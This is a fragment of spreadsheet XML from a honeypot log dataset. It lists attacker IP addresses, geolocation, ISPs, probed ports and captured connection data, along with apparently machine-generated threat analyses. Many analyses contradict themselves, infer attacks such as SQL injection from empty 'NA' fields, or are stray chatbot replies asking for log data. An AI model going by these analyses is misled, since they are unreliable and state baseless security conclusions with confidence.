    <t>SQL Injection &amp;&amp; SQL Attack</t>
  </si>
  <si>
    <t>5b1e3d48a9f0a7271ae11ff1ede3b69f</t>
  </si>
  <si>
    <t>115.96.125.180</t>
  </si>
  <si>
    <t>Howrah</t>
  </si>
  <si>
    <t>Bāli</t>
  </si>
  <si>
    <t>1277539</t>
  </si>
  <si>
    <t>22.6486</t>
  </si>
  <si>
    <t>88.3411</t>
  </si>
  <si>
    <t>::ffff:7360:7db4</t>
  </si>
  <si>
    <t>This log entry indicates that there was no activity detected on the telnet service, suggesting it is idle or unaffected by malicious attempts.
There are no login attempts or connections made to this port so far, which is unusual compared to other ports being targeted.
Malicious actors often target telnet for brute-force attacks. &amp;&amp; Telnet service is being accessed but there's no activity recorded, suggesting potential reconnaissance or probing attempts. 
This could be an attacker checking for vulnerable systems before launching a full-scale attack. 
The lack of actual data sent over telnet implies the attacker may be using scanning tools to identify potential entry points.</t>
  </si>
  <si>
    <t>2ad1c856fa43ae87839d906fe4ca32a1</t>
  </si>
  <si>
    <t>49.206.253.225</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;50464&amp;&amp;22&amp;&amp;103&amp;&amp;1433&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>ACT Fibernet</t>
  </si>
  <si>
    <t>2010-12-06</t>
  </si>
  <si>
    <t>ACTFIBERNET-Secundrabad</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (49.206.253.225,49709)}&amp;&amp;{Data_SMB:Incoming connection (49.206.253.225,49986)}&amp;&amp;{Data_SMB:Incoming connection (49.206.253.225,52327)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:31ce:fde1</t>
  </si>
  <si>
    <t>This log indicates an attempt to access Microsoft SQL Server services without specifying credentials. It suggests a potential brute-force attack or password guessing attempt. The lack of specified credentials is unusual and may indicate malicious intent.</t>
  </si>
  <si>
    <t>b63a922c49211402f4c7b4614c77eb01</t>
  </si>
  <si>
    <t>94.204.151.196</t>
  </si>
  <si>
    <t>15802</t>
  </si>
  <si>
    <t>Emirates Integrated Telecommunications Company PJSC</t>
  </si>
  <si>
    <t>Emirates Integrated Telecommunications Company</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}&amp;&amp;{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/27.0 Chrome/125.0.0.0 Mobile Safari/537.36}</t>
  </si>
  <si>
    <t>::ffff:5ecc:97c4</t>
  </si>
  <si>
    <t>An attempt to login with a potentially fake user agent was made from a Windows 10 machine. The browser type and version are also suspiciously high and outdated, suggesting the possibility of automation. This could be an attempt to evade detection or bypass security measures. &amp;&amp; An unknown user is attempting to access a login page on the monitored system using an Android device with a modified browser configuration. The browser's User Agent string suggests a potential spoofing or hiding of true browser identity. The device appears to be running an older version of Chrome. &amp;&amp; A user is attempting to log in using a fake browser string and an older version of Chrome on a mobile device to potentially exploit vulnerabilities or bypass login protections. This may be a tactic used by malicious actors to gain unauthorized access to a system. The use of an outdated browser version raises suspicions about the authenticity of the user's identity.</t>
  </si>
  <si>
    <t>ae375aa6f80e2ad7225ac97228c53169</t>
  </si>
  <si>
    <t>51.159.101.215</t>
  </si>
  <si>
    <t>51-159-101-215.rev.poneytelecom.eu&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SOCKS5_H10</t>
  </si>
  <si>
    <t>8443&amp;&amp;33752&amp;&amp;1080</t>
  </si>
  <si>
    <t>75008</t>
  </si>
  <si>
    <t>48.8714</t>
  </si>
  <si>
    <t>2.32141</t>
  </si>
  <si>
    <t>12876</t>
  </si>
  <si>
    <t>ONLINE S.A.S.</t>
  </si>
  <si>
    <t>SCALEWAY</t>
  </si>
  <si>
    <t>ONLINE</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>nsd.scaleway.com
        nsc.scaleway.com
        nsa.scaleway.com
        nsb.online.net
        nsa.online.net
        nsb.scaleway.com
Please visit www.eurid.eu for more info.</t>
  </si>
  <si>
    <t>Scaleway SAS</t>
  </si>
  <si>
    <t>::ffff:339f:65d7</t>
  </si>
  <si>
    <t>Possible malicious activity: Attempt to establish an unauthorized connection using SOCKS5 protocol, which is often used for proxying or anonymization. This could be indicative of an attempt to bypass security measures or hide the true source of a malicious request. The absence of specific data suggests that this attempt was likely unsuccessful or blocked.</t>
  </si>
  <si>
    <t>fefb39056d6daa2824d752af55fdf7d1</t>
  </si>
  <si>
    <t>152.32.153.228</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;21&amp;&amp;3306&amp;&amp;44456&amp;&amp;1521&amp;&amp;1080&amp;&amp;6379&amp;&amp;5900&amp;&amp;60707&amp;&amp;NA&amp;&amp;5432&amp;&amp;143&amp;&amp;44704&amp;&amp;123&amp;&amp;110&amp;&amp;445</t>
  </si>
  <si>
    <t>UCLOUD-ID</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;login&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_NTP:{'mode': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMB:Incoming connection (152.32.153.228,60806)}&amp;&amp;{Data_SMB:Incoming connection (152.32.153.228,46108)}</t>
  </si>
  <si>
    <t>::ffff:9820:99e4</t>
  </si>
  <si>
    <t>Possible malicious activity: A suspicious incoming SMB connection from an unknown IP address attempting to access the system. This could be an attempt to exploit vulnerabilities or spread malware. It may also indicate unauthorized access attempts. &amp;&amp; An incoming connection from an unknown IP address is attempting to access shared files or resources. This could be an attempt at unauthorized file transfer or accessing sensitive information. The nature of the activity suggests a potential attack on data confidentiality. &amp;&amp; The data indicates an incoming unauthorized connection to a shared resource, potentially from an external IP address, suggesting a potential security breach attempt through network sharing. The attacker is trying to gain access to the system's resources by connecting to it. This could be a precursor to a malicious file transfer or data theft. &amp;&amp; A suspicious incoming connection from an external IP address has been detected to a service that handles shared file and printer access. The IP address 152.32.153.228 attempted to initiate a connection on the SMB port, potentially trying to exploit vulnerabilities or gain unauthorized access. This could be an attempt at malicious data transfer or system compromise.</t>
  </si>
  <si>
    <t>Scanning SMB &amp;&amp; Port scan &amp;&amp; Port Scan &amp;&amp; SMB Scanning</t>
  </si>
  <si>
    <t>3c4c36b45bce2d183232755a45049f67</t>
  </si>
  <si>
    <t>120.56.106.144</t>
  </si>
  <si>
    <t>::ffff:7838:6a90</t>
  </si>
  <si>
    <t>No activity detected for TELNET service as indicated by 'NA' status, suggesting no malicious attempts or connections attempted via this service. &amp;&amp; No malicious activity detected in TELNET service, as the log indicates "Not Available" (NA). This suggests no attempts to connect or communicate through TELNET during this monitoring period. No alerts triggered for TELNET-related threats. &amp;&amp; The presence of this log indicates that there was an attempted connection to a telnet service, likely as part of reconnaissance or initial exploitation phase by a malicious actor. This could be a prelude to further attempts to gain unauthorized access to the system. The attempt itself may not have been successful but warrants further investigation.</t>
  </si>
  <si>
    <t>51307e3a2baace625206e21db9c5c1cd</t>
  </si>
  <si>
    <t>103.191.254.131</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H17&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_DNS_H4&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_DHCP_H15&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;42499&amp;&amp;53&amp;&amp;14265&amp;&amp;1433&amp;&amp;67&amp;&amp;62437&amp;&amp;445</t>
  </si>
  <si>
    <t>Rembang Regency</t>
  </si>
  <si>
    <t>Jadi</t>
  </si>
  <si>
    <t>8061009</t>
  </si>
  <si>
    <t>-6.77263</t>
  </si>
  <si>
    <t>111.275</t>
  </si>
  <si>
    <t>149943</t>
  </si>
  <si>
    <t>PT Ayodya Data Internusa</t>
  </si>
  <si>
    <t>2022-07-25</t>
  </si>
  <si>
    <t>IDNIC-ADINET-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,57464)}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,57748)}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,56555)}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,49306)}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,50106)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67bf:fe83</t>
  </si>
  <si>
    <t>9bba3d9b42fef63f6d96d280c50b5532</t>
  </si>
  <si>
    <t>103.160.182.124</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>3306&amp;&amp;445</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.160.182.124,63359)}&amp;&amp;{Data_SMB:Incoming connection (103.160.182.124,64190)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67a0:b67c</t>
  </si>
  <si>
    <t>Portscan &amp;&amp; SMB Attack</t>
  </si>
  <si>
    <t>8260fc71fd2b8b95aaa36dff888a289b</t>
  </si>
  <si>
    <t>115.187.40.204</t>
  </si>
  <si>
    <t>Hooghly</t>
  </si>
  <si>
    <t>Gangadharpur</t>
  </si>
  <si>
    <t>8985894</t>
  </si>
  <si>
    <t>712306</t>
  </si>
  <si>
    <t>22.76</t>
  </si>
  <si>
    <t>88.22</t>
  </si>
  <si>
    <t>ALLIANCE-GATEWAY-AS-AP</t>
  </si>
  <si>
    <t>::ffff:73bb:28cc</t>
  </si>
  <si>
    <t>Unknown access attempt to Microsoft SQL Server database, potentially for unauthorized data extraction or modification. The system is indicating no activity due to an unknown reason. A possible security vulnerability exists if the server's access credentials are exposed. &amp;&amp; This suggests an attempt to access or exploit Microsoft SQL Server functionality without being properly authorized or configured.
 The activity appears to be related to database-related malicious activity, possibly involving unauthorized access or attempts to escalate privileges.
 This could indicate a potential vulnerability in the system or misuse of existing accounts.</t>
  </si>
  <si>
    <t>fb0f3e4512ff23d59583bc771dbcab0f</t>
  </si>
  <si>
    <t>117.210.180.12</t>
  </si>
  <si>
    <t>::ffff:75d2:b40c</t>
  </si>
  <si>
    <t>No malicious activity detected for telnet service as log indicates "NA" (Not Applicable). No incoming or outgoing connections reported. Service appears to be inactive or not monitored. &amp;&amp; The data indicates an attempt to connect to the TELNET service, but no login credentials were provided or the connection was terminated before authentication could be completed. This is likely a port scan or reconnaissance activity. The attacker may have been probing for vulnerabilities or searching for open services.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Port Scanning</t>
  </si>
  <si>
    <t>d4d6ea944e487c8343f78f100ccbc247</t>
  </si>
  <si>
    <t>117.214.77.98</t>
  </si>
  <si>
    <t>::ffff:75d6:4d62</t>
  </si>
  <si>
    <t>No attempt made to access TELNET service. This indicates no malicious activity was detected for this service. No unusual traffic was logged for TELNET connections. &amp;&amp; This log indicates an attempt to connect using the Telnet service but was unsuccessful. The connection attempt is likely malicious, possibly an unauthorized access attempt. No further action was taken as the login attempt failed.</t>
  </si>
  <si>
    <t>0e3722b6b4af79d0509aa6de5cff8888</t>
  </si>
  <si>
    <t>121.176.50.182</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H22</t>
  </si>
  <si>
    <t>80&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Miryang-si</t>
  </si>
  <si>
    <t>Miryang-si (Naei-dong)</t>
  </si>
  <si>
    <t>1841147</t>
  </si>
  <si>
    <t>35.4992</t>
  </si>
  <si>
    <t>128.741</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:79b0:32b6</t>
  </si>
  <si>
    <t>This indicates a potential web scanning activity, likely for exploitation or vulnerability assessment, as the user-agent is curl and the request is to the root directory of a server.
The use of '*' in the Accept header suggests an attempt to identify supported content types.
A malicious actor may be probing the server for vulnerabilities. &amp;&amp; A malicious agent is accessing the server with an unknown host, using a generic user-agent and attempting to retrieve the root directory of the service. This could be an attempt to scan or exploit the system for vulnerabilities. The request appears to come from an external IP address. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No malicious activity detected, insufficient log data provided. 
This suggests that either the system is not capturing logs or there has been no recent suspicious behavior recorded. 
In this case, it's difficult to make any conclusions about potential threats. &amp;&amp; There is insufficient data provided for analysis, no specific log data has been given.</t>
  </si>
  <si>
    <t>I need log data to analyze and provide an answer. Please provide the log data, and I'll be happy to help!</t>
  </si>
  <si>
    <t>130b5db4ac459b1088226b29e4dcddd0</t>
  </si>
  <si>
    <t>196.206.225.151</t>
  </si>
  <si>
    <t>NA&amp;&amp;adsl196-151-225-206-196.adsl196-8.iam.net.ma</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MSSQL_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;631&amp;&amp;443&amp;&amp;22&amp;&amp;1080&amp;&amp;3306&amp;&amp;80&amp;&amp;5900&amp;&amp;9100&amp;&amp;6379&amp;&amp;30472&amp;&amp;NA</t>
  </si>
  <si>
    <t>Boukhalef</t>
  </si>
  <si>
    <t>2572146</t>
  </si>
  <si>
    <t>35.7328</t>
  </si>
  <si>
    <t>-5.89954</t>
  </si>
  <si>
    <t>6713</t>
  </si>
  <si>
    <t>Itissalat Al-MAGHRIB</t>
  </si>
  <si>
    <t>IP ADSL MarocTelecom</t>
  </si>
  <si>
    <t>::ffff:c4ce:e197</t>
  </si>
  <si>
    <t>ceb3a6fc444aee9d616b504a861fdd1d</t>
  </si>
  <si>
    <t>117.217.83.45</t>
  </si>
  <si>
    <t>::ffff:75d9:532d</t>
  </si>
  <si>
    <t>No activity detected, as telnet is NA (not available). &amp;&amp; No malicious activity detected for TELNET service. The log is indicating that there were no incoming connections to the TELNET service during the monitoring period. No attempts to exploit or scan TELNET vulnerabilities reported.</t>
  </si>
  <si>
    <t>34538cd120bc9bd27f43be4e0fd5643e</t>
  </si>
  <si>
    <t>47.247.77.42</t>
  </si>
  <si>
    <t>1989-01-06</t>
  </si>
  <si>
    <t>::ffff:2ff7:4d2a</t>
  </si>
  <si>
    <t>0122137604044337d6dc246af8476cbe</t>
  </si>
  <si>
    <t>194.187.176.167</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>143&amp;&amp;5900&amp;&amp;443&amp;&amp;25&amp;&amp;21&amp;&amp;23&amp;&amp;3389&amp;&amp;NA&amp;&amp;19968&amp;&amp;6379&amp;&amp;110</t>
  </si>
  <si>
    <t>{Data_IMAP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '5.181.21.224', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b0a7</t>
  </si>
  <si>
    <t>The presence of this log entry suggests that an attacker is attempting to exploit the IMAP service for malicious purposes, possibly to gain unauthorized access or launch further attacks. The IMAP service appears to be inactive or not responding as expected. This could indicate a scanning activity from the attacker's side.</t>
  </si>
  <si>
    <t>IMAP Attack</t>
  </si>
  <si>
    <t>9186b69a508b648db31c08f032e71636</t>
  </si>
  <si>
    <t>117.247.90.224</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;10661&amp;&amp;14434&amp;&amp;10072&amp;&amp;15840</t>
  </si>
  <si>
    <t>BB Multiplay Static</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,22376)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,10125)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,12169)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,12638)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,21378)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,9977)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,21778)}</t>
  </si>
  <si>
    <t>::ffff:75f7:5ae0</t>
  </si>
  <si>
    <t>Here are the possible malicious activities and the corresponding attack types: &amp;&amp; The presence of this log indicates an attempt to exploit Microsoft SQL Server vulnerability, likely through a brute-force attack or malicious query injection, attempting to gain unauthorized access to the database. 
This behavior is often associated with credential stuffing and password cracking attempts.
A potential data breach or system compromise may be imminent if left unchecked.</t>
  </si>
  <si>
    <t>The attacker is attempting to gather information about the network and its services by sending various probes and requests. They are trying to identify vulnerabilities in the system, possibly for future exploitation. The attacker is also attempting to authenticate with different protocols, likely as part of a reconnaissance or enumeration phase.</t>
  </si>
  <si>
    <t>7775442b3996640956c65f12dd7f4dbd</t>
  </si>
  <si>
    <t>112.196.41.229</t>
  </si>
  <si>
    <t>S.A.S Nagar</t>
  </si>
  <si>
    <t>S.A.S Nagar (Industrial Area)</t>
  </si>
  <si>
    <t>8407426</t>
  </si>
  <si>
    <t>30.7165</t>
  </si>
  <si>
    <t>76.6905</t>
  </si>
  <si>
    <t>17917</t>
  </si>
  <si>
    <t>Quadrant Televentures Limited</t>
  </si>
  <si>
    <t>Hfcl Infotel LTD</t>
  </si>
  <si>
    <t>2009-02-11</t>
  </si>
  <si>
    <t>BroadBand_Customers_New_Town</t>
  </si>
  <si>
    <t>::ffff:70c4:29e5</t>
  </si>
  <si>
    <t>This log indicates an attempt to access or interact with Microsoft SQL Server services, potentially for malicious purposes such as data theft or unauthorized access. The lack of data (indicated by 'NA') may suggest the attacker is probing for vulnerabilities or testing system defenses. This activity suggests a potential SQL injection attack.</t>
  </si>
  <si>
    <t>a98390b09a6a59cc73f1b1ece1fc6cb1</t>
  </si>
  <si>
    <t>178.160.216.102</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>Armenia</t>
  </si>
  <si>
    <t>ER</t>
  </si>
  <si>
    <t>Yerevan</t>
  </si>
  <si>
    <t>Yerevan (Kanakerr-Zeytun)</t>
  </si>
  <si>
    <t>616052</t>
  </si>
  <si>
    <t>40.2096</t>
  </si>
  <si>
    <t>44.5306</t>
  </si>
  <si>
    <t>12297</t>
  </si>
  <si>
    <t>Telecom Armenia OJSC</t>
  </si>
  <si>
    <t>Telecom Armenia CJSC</t>
  </si>
  <si>
    <t>Armenia Telephone Company</t>
  </si>
  <si>
    <t>::ffff:b2a0:d866</t>
  </si>
  <si>
    <t>There is no log data provided, so I have nothing to analyze or describe as possible malicious activity. &amp;&amp; There is insufficient information to analyze. This log data appears blank, providing no insight into potential malicious activities. The lack of details makes it impossible to draw any conclusions about possible threats.</t>
  </si>
  <si>
    <t>I'd be happy to help, but it seems like there's no log data provided. Could you please share the actual log data from the honeypot? I'll do my best to analyze it and provide the types of attacks detected.</t>
  </si>
  <si>
    <t>40cd784ae4185279ba7f3637345e8b75</t>
  </si>
  <si>
    <t>192.141.34.151</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>267458</t>
  </si>
  <si>
    <t>ITMINDS CONSULTORIA EM TECNOLOGIA DA INFORMACAO</t>
  </si>
  <si>
    <t>Itminds Consultoria EM Tecnologia DA Informacao</t>
  </si>
  <si>
    <t>::ffff:c08d:2297</t>
  </si>
  <si>
    <t>There is insufficient information to analyze the log data for possible malicious activity.</t>
  </si>
  <si>
    <t>I don't see any log data provided. Please provide the log data so I can analyze it and identify the types of attacks.</t>
  </si>
  <si>
    <t>ad04779a69f04ca956f0ac3e177351f4</t>
  </si>
  <si>
    <t>43.242.209.230</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>Thāne (Kashish Park)</t>
  </si>
  <si>
    <t>19.1874</t>
  </si>
  <si>
    <t>72.9631</t>
  </si>
  <si>
    <t>MACH1</t>
  </si>
  <si>
    <t>2014-09-04</t>
  </si>
  <si>
    <t>MACH1-IN</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (43.242.209.230,58657)}</t>
  </si>
  <si>
    <t>::ffff:2bf2:d1e6</t>
  </si>
  <si>
    <t>Possible malicious activity: Incoming unauthorized SMB connection from suspicious IP 43.242.209.230 attempting to connect to port 58657, potentially indicating a network scanning or exploitation attempt to access shared resources. The IP appears to be from an unknown or untrusted source, adding to the suspicion of malicious intent. &amp;&amp; Possible malicious activity is an incoming unauthorized SMB connection from an IP address trying to establish a non-standard port 58657 which could be a potential sign of exploitation or scanning activity. The source IP address may be attempting to access system resources or sensitive files. This type of connection may indicate a brute force attack on shared folders.</t>
  </si>
  <si>
    <t>Portscan &amp;&amp; SMB Scanning</t>
  </si>
  <si>
    <t>8516d69031ae83e84d86bfa539a010b0</t>
  </si>
  <si>
    <t>120.28.201.217</t>
  </si>
  <si>
    <t>Soccsksargen</t>
  </si>
  <si>
    <t>Province of Cotabato</t>
  </si>
  <si>
    <t>Patindeguen</t>
  </si>
  <si>
    <t>1694382</t>
  </si>
  <si>
    <t>7.21972</t>
  </si>
  <si>
    <t>124.498</t>
  </si>
  <si>
    <t>::ffff:781c:c9d9</t>
  </si>
  <si>
    <t>bbad5531df66517a4104dbef2fafc97c</t>
  </si>
  <si>
    <t>117.212.30.33</t>
  </si>
  <si>
    <t>::ffff:75d4:1e21</t>
  </si>
  <si>
    <t>The data indicates an attempt to connect or communicate via TELNET but was unsuccessful. This could be an initial reconnaissance step by an attacker. The lack of connection may suggest the attacker's failure to compromise the system. &amp;&amp; No login attempt was made via telnet service. No malicious activity detected for this service. Normal operation assumed.</t>
  </si>
  <si>
    <t>58dbb4981fd115e86b900df7c6dc0196</t>
  </si>
  <si>
    <t>103.167.204.26</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>Rohtak</t>
  </si>
  <si>
    <t>Rohtak (Company Bagh)</t>
  </si>
  <si>
    <t>1258076</t>
  </si>
  <si>
    <t>124001</t>
  </si>
  <si>
    <t>28.8999</t>
  </si>
  <si>
    <t>76.5844</t>
  </si>
  <si>
    <t>Fibre Air Services Private Limited</t>
  </si>
  <si>
    <t>Sdnet10</t>
  </si>
  <si>
    <t>SDNET10</t>
  </si>
  <si>
    <t>::ffff:67a7:cc1a</t>
  </si>
  <si>
    <t>17a8542ee82f3ffc43f41579681f6788</t>
  </si>
  <si>
    <t>117.208.242.32</t>
  </si>
  <si>
    <t>::ffff:75d0:f220</t>
  </si>
  <si>
    <t>No attempt was made to connect using TELNET, which could indicate legitimate or benign activity since no connection was established. This may be due to incorrect credentials or an inactive service. The lack of any TELNET activity does not necessarily suggest malicious intentions. &amp;&amp; The data suggests there was no activity recorded for the TELNET service, indicating it may have been scanned or probed but not exploited. No login attempts were made to this service. This could be an attempt to gather information about potential vulnerabilities.</t>
  </si>
  <si>
    <t>Port Scanning &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>637b966f08dcc25faa0eb202af568dd5</t>
  </si>
  <si>
    <t>117.206.143.112</t>
  </si>
  <si>
    <t>::ffff:75ce:8f70</t>
  </si>
  <si>
    <t>709b1a84fb90c123616df8dd94aca074</t>
  </si>
  <si>
